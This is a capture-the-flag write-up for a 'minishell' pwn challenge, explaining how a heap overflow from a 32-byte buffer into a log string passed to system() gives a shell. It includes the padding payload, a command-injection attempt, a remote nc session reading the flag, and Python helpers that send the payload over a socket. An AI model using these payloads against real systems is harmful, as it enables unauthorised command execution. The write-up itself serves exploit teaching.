IMPORTANT: You can also find this write-up (and others), along with the source code, on my GitHub.
Basics
First of all, we don’t have binaries associated with the challenge, so I had to compile them:
gcc log.c -o log
gcc minishell.c -lcrypto -o minishell
Once this is done we can start reading the source code!
Note:
Contrary to what I usually say and do, there is no need here to inspect the binary with file, checksec, strings, ldd, ltrace and strace, because we compiled it ourselves!
We cannot be sure that the remote binary was compiled the same way; still, a local build is useful to experiment a bit.
Source code inspection
Please find the source code on my GitHub
So let’s read the code!
log.c is really simple: just a main function. It’s a logging tool that writes the arguments passed on the command line to a log file, that’s all.
minishell.c is really something else: 269 lines of code.
When reading C code I always start by looking globally at the function names, and then I dive into the main function first.
Here it helped a lot: in main we quickly note that there is a bunch of variable initializations, some memory allocation and then a while(1)!
This is the infinite loop allowing the shell to always wait for user instructions.
We understand that the user is prompted for a string, which is then verified (some characters are forbidden in commandAllowed, maybe there is something here) and parsed with strtok.
Then a chain of if/else identifies which function to execute given the user command. At that point I could have started looking into each and every function to look for vulnerabilities, but I didn’t.
I wanted to finish reading main first, and that turned out to be the right choice.
So we continue reading main down to the last else (the case where the command doesn’t match any predefined string), and there we have some really interesting stuff!
}else {
    char *log = malloc(256 * sizeof(char));
    strcpy(log, "./log Error with command:");
    strcpy(arg, cmd);
    strcat(log, arg);
    system(log);
    printf("Unknow command, this event has been reported\n");
}
Some strcpy, a strcat and above all a system call!
Of course it instantly caught my eye: if we were able to control the log variable, we could inject some commands here.
Unfortunately a predefined string is written into log, and even if we control cmd it is just appended by strcat to "./log Error with command:" (remember, ./log is the second binary compiled at the beginning). Because special characters like ; or && are forbidden, we cannot inject a second command into log 😢
Note:
However, I first noticed that at the beginning of the while loop, buffer is copied into cmd before being verified with commandAllowed.
So I tested an exploit where I injected a forbidden command, aa; /bin/sh, which won’t be executed but will be written into cmd anyway.
Then I injected a second one, a, which is allowed but unrecognized: the idea was that it wouldn’t totally overwrite cmd, which would then be something like a\n; /bin/sh and be appended to log, then executed.
Unfortunately, strcpy copies the terminating \x00 along with the string, so a null byte ends up between the “new” injection a and the “remaining” one in cmd. It ends the string, and even though the rest of the payload is still there on the heap (cmd is malloc’d), it isn’t copied into log and is never executed by system.
So close!
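A minimal Python sketch of why this attempt fails, assuming the input arrives with its trailing newline and is copied with strcpy semantics, as described in the note. The helpers c_strcpy and c_string are made up for the illustration and only model the C behaviour on a bytearray.

```python
def c_strcpy(dest: bytearray, src: bytes) -> None:
    """Mimic strcpy: copy src up to its first NUL, then write that NUL too."""
    end = src.index(0) if 0 in src else len(src)
    dest[:end] = src[:end]
    dest[end] = 0


def c_string(buf: bytearray) -> bytes:
    """Read a buffer the way C does: stop at the first NUL byte."""
    return bytes(buf[:buf.index(0)])


cmd = bytearray(256)                 # stands in for the 256-byte cmd buffer

c_strcpy(cmd, b"aa; /bin/sh\n\x00")  # first input: rejected, but already copied
c_strcpy(cmd, b"a\n\x00")            # second input: allowed but unrecognized

print(bytes(cmd[:13]))  # raw memory: b'a\n\x00 /bin/sh\n\x00'
print(c_string(cmd))    # what strcat and system would see: b'a\n'
```

In this model the NUL written by the second copy lands exactly on the ; of the first input, so the leftover /bin/sh is still in memory but unreachable as part of the string.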
So the real vulnerability is still here, lying right under our eyes: arg is simply not the same size as cmd, so copying a long cmd into arg overflows it.
char* buffer = malloc(256 * sizeof(char));
char* cmd = malloc(256 * sizeof(char));
char *arg = malloc(32 * sizeof(char));
Because arg is on the heap, the question is then: what do we overflow?
And the answer is: “if it’s the first prompt, probably log, which is allocated right after arg”. So in the end we do control log!!!
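Here is a rough Python model of that overflow, not the real allocator. It treats the heap as one flat bytearray with arg at offset 0 and log a fixed distance later. The 48-byte distance is an assumption (what a typical 64-bit glibc gives for malloc(32)), and c_strcpy and c_string are illustration-only helpers.

```python
ARG_SIZE = 32    # malloc(32 * sizeof(char)) in the source
LOG_OFFSET = 48  # ASSUMPTION: log's data starts 48 bytes after arg's data
LOG_SIZE = 256   # malloc(256 * sizeof(char)) in the source


def c_strcpy(mem: bytearray, at: int, src: bytes) -> None:
    """Mimic strcpy: no bounds check, copy src then a terminating NUL."""
    mem[at:at + len(src)] = src
    mem[at + len(src)] = 0


def c_string(mem: bytearray, at: int) -> bytes:
    """Read a C string: everything from `at` up to the first NUL."""
    return bytes(mem[at:mem.index(0, at)])


heap = bytearray(LOG_OFFSET + LOG_SIZE)  # arg at offset 0, log at LOG_OFFSET
arg, log = 0, LOG_OFFSET

cmd = b"A" * LOG_OFFSET + b"/bin/sh\n"   # user input, far longer than arg
assert len(cmd) > ARG_SIZE               # the copy cannot fit in arg

c_strcpy(heap, log, b"./log Error with command:")  # strcpy(log, "...")
c_strcpy(heap, arg, cmd)                           # strcpy(arg, cmd) spills into log

print(c_string(heap, log))  # b'/bin/sh\n'
```

The strcat(log, arg) that follows is left out on purpose: with arg now running into log the two strings overlap, which is undefined behaviour in C, and it only appends text after the first line that system ends up running.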
Exploitation
Now arg is 32 bytes long, and because we’re on the heap we will first overwrite the chunk header before overwriting log’s content.
To determine exactly the padding needed for our payload, either we know the heap chunk header size, or we use gdb (which is often really useful), but even simpler: a smart payload such as AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGG (generated with a for loop in Python to avoid silly mistakes…) will easily do the job.
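The original loop is not shown in this write-up, so the following is only one possible way to build such a pattern in Python. The function name make_pattern and its parameters are made up for the example.

```python
import string


def make_pattern(blocks: int, width: int = 8) -> str:
    """Build blocks of `width` identical letters: AAAAAAAABBBBBBBB..."""
    pattern = ""
    for letter in string.ascii_uppercase[:blocks]:
        pattern += letter * width
    return pattern


pattern = make_pattern(7)
print(pattern)       # AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGG
print(len(pattern))  # 56
```

Because every 8-byte block uses a different letter, whichever block shows up as the executed command gives the offset directly.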
We inject it and see:
$ ./minishell
spaceshell> AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGG
sh: line 1: GGGGGGGG: command not found
sh: line 2: AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGG: command not found
sh: line 3: AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDE: command not found
Unknow command, this event has been reported
spaceshell>
Victory! GGGGGGGG is executed as a command (I confirmed it with ltrace ./minishell and saw the call to system with our payload, and the result).
We then infer that a heap chunk header is 16 bytes long: our payload padding is AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFF, which is 48 bytes, and minus the 32 bytes of arg we get 16 bytes for the header.
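The same arithmetic can be cross-checked in Python. The sketch below assumes a 64-bit glibc, where the size field is 8 bytes, chunks are aligned on 16 bytes and the minimum chunk size is 32 bytes. The function chunk_size is my own paraphrase of glibc's request-to-chunk-size rounding, not code taken from the challenge.

```python
SIZE_SZ = 8            # ASSUMPTION: size field width on 64-bit glibc
MALLOC_ALIGNMENT = 16  # ASSUMPTION: chunk alignment on 64-bit glibc
MIN_CHUNK_SIZE = 32    # ASSUMPTION: smallest chunk on 64-bit glibc


def chunk_size(request: int) -> int:
    """Round a malloc request up to the size of the chunk that holds it."""
    mask = MALLOC_ALIGNMENT - 1
    return max((request + SIZE_SZ + mask) & ~mask, MIN_CHUNK_SIZE)


pattern = "".join(letter * 8 for letter in "ABCDEFG")
offset = pattern.index("GGGGGGGG")  # first block that landed in log

print(offset)          # 48: padding needed before the command
print(offset - 32)     # 16: bytes sitting between arg's data and log's data
print(chunk_size(32))  # 48: distance predicted for malloc(32)
```

Under these assumptions the measured offset matches the predicted chunk size, which is a useful sanity check before reusing the same padding against the remote binary.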
The final payload is of course AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFF/bin/sh, and with that we get our shell.
Locally:
$ ./minishell
spaceshell> AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFF/bin/sh
sh-5.2$ whoami
ctmbl
Remotely (I could have used /bin/sh too of course):
$ nc 20.19.241.70 3001
spaceshell> AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFcat /home/ctf/flag.txt
THCON{G00d_0ld_0v3rfl0w}Unknow command, this event has been reported
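The flag above was obtained by hand with nc. For reference, here is a hedged sketch of the same interaction using only Python's standard socket module. The function names build_payload and run_remote are hypothetical, the 48-byte padding is the value measured locally, and the host and port are simply the ones from the session above, which may no longer be online.

```python
import socket

PADDING = 48  # bytes between arg and log, as measured on the local build


def build_payload(command: str, padding: int = PADDING) -> bytes:
    """Fill arg and the chunk header, then place the command at the start of log."""
    return b"A" * padding + command.encode() + b"\n"


def run_remote(host: str, port: int, command: str, timeout: float = 5.0) -> bytes:
    """Send one payload and return everything the service answers."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as conn:
        conn.sendall(build_payload(command))
        try:
            while True:
                data = conn.recv(4096)
                if not data:          # connection closed by the server
                    break
                chunks.append(data)
        except socket.timeout:        # server went quiet: assume it is done
            pass
    return b"".join(chunks)


# Example call (needs network access, so it is left commented out):
# print(run_remote("20.19.241.70", 3001, "cat /home/ctf/flag.txt").decode(errors="replace"))
```

Keeping the payload construction separate from the network code makes it easy to test the same bytes against the local ./minishell first.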
A good old overflow for sure, but a good reminder and a nice introduction to heap overflows overall.
Conclusion
To sum up, here are the main steps of the reasoning while tackling this challenge (and maybe how to tackle other pwn challenges):
- First: what have I got? What do I want to achieve?
  Source code, no binaries, remote access to the running binary -> we want a shell on the remote machine.
- Here we got source code but no binary, so we skip the inspection part and just compile the source code as best we can.
  We’ll have to make assumptions about the protections of the remote binary.
  Note that these first two steps are often forgotten, but they basically drive the rest of the exploit…
- Dive into the source code: take a global look at the code but quickly focus on main.
  We do not try to understand everything or every line, just identify the structure of the code and potentially flawed lines: arrays, malloc and free, printf, bounds of for loops, Time of Check Time of Use (TOCTOU)…
- We do not look at other functions until we have finished reading main.
- Get a first idea, try it, understand why it works, or why it doesn’t.
- Find a possibly exploitable bug (here a buffer overflow), confirm it by several means (direct execution and ltrace in my case) and rigorously define the needed payload (in my case the size of the padding).
- Exploit, flag, celebrate 🎉
Resources
If in doubt, you can always contact me on Discord (ctmbl) or open an issue on my GitHub if you need more information or resources.
Links:
- what is a buffer overflow: https://en.wikipedia.org/wiki/Buffer_overflow#Example
- more about heap structure and exploitation: https://heap-exploitation.dhavalkapil.com/diving_into_glibc_heap/malloc_chunk
- strcpy: https://man7.org/linux/man-pages/man3/strcpy.3.html
- strcat: https://linux.die.net/man/3/strcat
- strtok: https://man7.org/linux/man-pages/man3/strtok.3.html
- system: https://man7.org/linux/man-pages/man3/system.3.html